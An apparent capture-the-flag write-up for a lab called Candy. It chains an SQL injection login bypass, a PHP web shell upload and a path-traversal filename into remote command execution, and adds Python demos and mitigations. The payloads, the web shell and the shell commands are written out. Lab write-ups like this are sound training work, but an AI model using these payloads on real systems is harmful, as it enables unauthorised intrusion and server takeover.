SQL Injection & File Upload Abuse – Admin Bypass Leading to RCE | Candy
Lab Link
Lab: Candy
Overview
This lab simulates a themed confectionery website with a hidden staff portal. The application contains multiple security issues, starting with SQL injection in the login flow and escalating through insecure file upload handling to remote command execution.
Objective
Bypass the admin login, gain access to the staff portal, exploit insecure file upload functionality, and achieve remote command execution to retrieve the flag from the server.
Exploitation
1. Admin login bypass (SQL Injection)
The staff login portal is discovered:
https://2b22935e-4065-candy-8794a.events.webverselabs-pro.com/admin/login.php
SQL injection bypass payload:
' or 1=1-- -
The leading quote closes the open string literal, or 1=1 makes the WHERE clause unconditionally true, and -- - comments out the remainder of the query, including the password comparison. The first matching row is returned and access is granted without valid credentials.
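To make the bypass concrete, here is an added Python example (not part of the lab or of the original writeup) that runs the same payload against a login query built by string concatenation and against a parameterised one, using an in-memory SQLite database. The users table, its schema and the account names and passwords are constructed for the demo and are assumptions, not the lab's real data.

```python
import sqlite3

PAYLOAD = "' or 1=1-- -"  # the bypass string from the writeup


def make_db():
    """Constructed stand-in for the staff database (assumed schema and rows)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    db.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "correct-horse-battery"), ("aurora", "candyfloss")],
    )
    db.commit()
    return db


def injected_query(username, password):
    """The SQL text a concatenating login handler actually sends."""
    return (
        "SELECT id, username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )


def vulnerable_login(db, username, password):
    """Builds the query by string concatenation, as the lab's login form
    evidently does: whatever the user types becomes part of the SQL grammar."""
    row = db.execute(injected_query(username, password)).fetchone()
    return row[1] if row else None


def safe_login(db, username, password):
    """Parameterised query: the driver sends the values separately from the
    statement, so quotes and comment markers inside them have no SQL meaning."""
    row = db.execute(
        "SELECT id, username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[1] if row else None


if __name__ == "__main__":
    db = make_db()
    print(injected_query(PAYLOAD, "anything"))
    print("vulnerable:", vulnerable_login(db, PAYLOAD, "anything"))  # admin
    print("parameterised:", safe_login(db, PAYLOAD, "anything"))  # None
```

The vulnerable function returns the first account in the table (here "admin") for any password, which is exactly the behaviour the lab exploits; the parameterised version treats the payload as a literal username that matches nothing.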
2. Upload functionality discovered
After login, an avatar upload feature is found:
/admin/profile.php
This endpoint allows file uploads, which becomes the main attack surface.
3. Initial web shell upload
A PHP shell is uploaded:
<?php system($_GET['cmd']); ?>
Saved location observed:
/uploads/shell.php
However, the shell does not execute here: the web server serves files under /uploads/ as plain text rather than passing them to the PHP interpreter, so the source is returned instead of the command output.
4. Directory traversal attempt in upload
The upload request is intercepted and the filename is replaced with a traversal sequence:
POST /admin/upload-avatar.php
Attempted payload:
../../../includes/shell.php
This attempt fails: the handler's path resolution restrictions reject a path this far above the upload directory.
5. Adjusted traversal path
A shallower payload is tried instead:
../includes/shell.php
The response confirms the altered storage path:
/uploads/../includes/shell.php
The single ../ steps out of /uploads/ into its sibling /includes/, a directory under the web root where the server does execute PHP, so the shell is now in a reachable, executable location.
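The path handling behind steps 3 to 5, as an added Python model that is not the lab's code: the client-supplied filename is joined onto the upload directory unchanged, which is why ../includes/shell.php resolves to a sibling directory, shown beside a hardened handler that allowlists extensions, generates its own stored filename and verifies that the resolved path stays inside the upload directory. The web root layout (/var/www/html with uploads/ and includes/ beneath it) and the allowed extension list are assumptions for the demo.

```python
import posixpath
import secrets

# Assumed layout for the demo; the lab only exposes /uploads/ and /includes/ as URL paths.
WEB_ROOT = "/var/www/html"
UPLOAD_DIR = posixpath.join(WEB_ROOT, "uploads")
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}  # assumed avatar allowlist


def vulnerable_destination(client_filename):
    """Models the lab's handler: the filename from the multipart request is
    appended to the upload directory as-is. The '..' segments survive in the
    string, which is the path the server reported back (/uploads/../includes/...)."""
    return UPLOAD_DIR + "/" + client_filename


def resolved(path):
    """What the filesystem actually opens once '..' segments are applied."""
    return posixpath.normpath(path)


def is_inside(path, base):
    """True only if the resolved path is base itself or lies beneath it
    (a string-prefix check would wrongly accept /uploads2/)."""
    return posixpath.commonpath([posixpath.normpath(path), base]) == base


def hardened_destination(client_filename):
    """Safe handler: the client name is never used as a path component."""
    name = posixpath.basename(client_filename)  # drop any directory parts
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension {ext!r} not allowed")
    # The stored name is generated server-side; the client never controls it,
    # so double extensions or traversal in the original name are irrelevant.
    dest = posixpath.join(UPLOAD_DIR, f"{secrets.token_hex(16)}.{ext}")
    # Defence in depth: confirm the resolved path is still inside UPLOAD_DIR.
    if not is_inside(dest, UPLOAD_DIR):
        raise ValueError("destination escapes the upload directory")
    return dest


if __name__ == "__main__":
    raw = vulnerable_destination("../includes/shell.php")
    print("stored as reported:", raw)
    print("actually written to:", resolved(raw))
    print("inside upload dir:", is_inside(raw, UPLOAD_DIR))
    print("hardened:", hardened_destination("avatar.png"))
```

The model only covers path handling; a production handler should also verify the file's content (magic bytes) rather than trust the extension, and the upload directory should sit outside the web root or have script execution disabled, so that even a bypass of the name checks cannot yield code execution.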
6. Command execution achieved
Accessing the shell:
https://2b22935e-4065-candy-8794a.events.webverselabs-pro.com/includes/shell.php?cmd=id
Output:
uid=1101(aurora) gid=1101(aurora) groups=1101(aurora)
Remote command execution confirmed.
7. Locating the flag
Search for flag file:
find / -name "*flag*" 2>/dev/null
Result:
/flag.txt
8. Reading the flag
cat /flag.txt
Final output:
WEBVERSE{.....}
Impact
- Authentication bypass via SQL Injection
- Unauthorized admin access
- Insecure file upload leading to server-side code execution
- Full command execution on target system
- Sensitive file disclosure
Mitigation
- Use parameterized queries (prepared statements) for the login query; never concatenate user input into SQL
- Implement strict authentication and session validation on every staff-portal page, not only the login form
- Restrict uploads to an allowlist of safe types, checked by extension and by file content, and never accept executable formats such as .php
- Store uploads outside the web root, or in a location where the web server has script execution disabled
- Never use the client-supplied filename as a path: generate the stored name server-side and verify the resolved path stays inside the upload directory
- Disable execution permissions in upload directories as defence in depth
